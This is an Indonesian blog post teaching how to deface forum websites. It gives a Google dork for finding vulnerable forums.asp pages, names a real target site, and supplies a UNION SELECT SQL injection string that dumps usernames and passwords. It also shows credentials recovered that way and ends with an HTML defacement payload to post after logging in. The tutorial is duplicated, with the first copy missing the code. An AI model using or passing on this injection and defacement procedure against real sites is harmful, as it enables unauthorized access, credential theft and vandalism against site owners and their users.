Cara Deface Situs Forum |
Halo sobat SEO XT, sudah cukup lama saya tidak share tentang deface nah
untuk itu kali ini saya akan membagikan sebuah trik sederhana untuk
deface sebuah situs forum dengan SQL Inject , triknya cukup simple dan
mudah di menegerti yg terpenting adalah konsisten dalam mengikuti tahap
tahapnya .. Oke let's try it :
Cara Deface Situs Forum :
1. Pertama pergi ke www.google.co.id
2. Ketikkan dork berikut di google dan enter
3. Pilih salah satu target, contoh ini target ane : http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=18
4. Hapus angka dibelakang =, sehingga menjadi
http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=
5. Stelah itu masukkan kode SQL inject berikut setelah = :
6. Hingga menjadi seperti ini :
http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Tulisan yang berderet dibawah nama 10 TOPICS itu adalah usernamenya
tulisan yang berderet dibawah nama DATED itu adalah passwordnya
7. Pilih username dan password yang anda inginkan,
sebagai contoh saya menemukan username ;
username : roland
password : roland
8. Lalu klik tulisan login yang berada di atas
nah silahkan login dengan username dan password yang tadi anda temukan
9 Jika login sudah berhasil, saatnya beraksi untuk deface .. Klik post new topics
10. Subjectnya isikan saja : Hacked by NAMA KAMU
lalu masukin script berikut ke kolom di bawah subject :
NB : yg berwarna merah, bisa sobat ubah sesuai keinginan sobat
11. Lalu klik tombol post .. dan anda telah mende face salah satu halaman situs forum tersebut
sekarang klik judul postingan di forum tersebut yang sobat tulis di subject tadi
DEMO Website yang telah ter deface :
http://www.coachgirl.com
http://www.ecreators.co.uk
Sumber : -[ Klik Disini ]-
Cara Deface Situs Forum :
1. Pertama pergi ke www.google.co.id
2. Ketikkan dork berikut di google dan enter
inurl:/forums.asp?iFor=
3. Pilih salah satu target, contoh ini target ane : http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=18
4. Hapus angka dibelakang =, sehingga menjadi
http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=
5. Stelah itu masukkan kode SQL inject berikut setelah = :
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
6. Hingga menjadi seperti ini :
http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Tulisan yang berderet dibawah nama 10 TOPICS itu adalah usernamenya
tulisan yang berderet dibawah nama DATED itu adalah passwordnya
7. Pilih username dan password yang anda inginkan,
sebagai contoh saya menemukan username ;
username : roland
password : roland
8. Lalu klik tulisan login yang berada di atas
nah silahkan login dengan username dan password yang tadi anda temukan
9 Jika login sudah berhasil, saatnya beraksi untuk deface .. Klik post new topics
10. Subjectnya isikan saja : Hacked by NAMA KAMU
lalu masukin script berikut ke kolom di bawah subject :
<div align=center><DIV id=layer1 style="border-right: #000000 1px; border-top: #000000 1px; z-index: 1; left: 0px; border-left: blue 1px; width: 1350px; border-bottom: black 1px; position: absolute; top: 0px; height: 698px; background-color: blue; layer-background-color: blue"><center> <br><b><font face="papyrus" color="black" size="5">Hacked By Roland Hackerz</font></h2><br><br><img src="http://i1121.photobucket.com/albums/l513/iqbalkanci/images8.jpg"><br><br> <font face="papyrus" color="green" size="4">Keep visiting : www.seo-xt.blogspot.com</a><br> <br><font color="red" size="3">your security is low, please patch your system ! </div>
NB : yg berwarna merah, bisa sobat ubah sesuai keinginan sobat
11. Lalu klik tombol post .. dan anda telah mende face salah satu halaman situs forum tersebut
sekarang klik judul postingan di forum tersebut yang sobat tulis di subject tadi
DEMO Website yang telah ter deface :
http://www.coachgirl.com
http://www.ecreators.co.uk
Sumber : -[ Klik Disini ]-
0 Comments
Post a Comment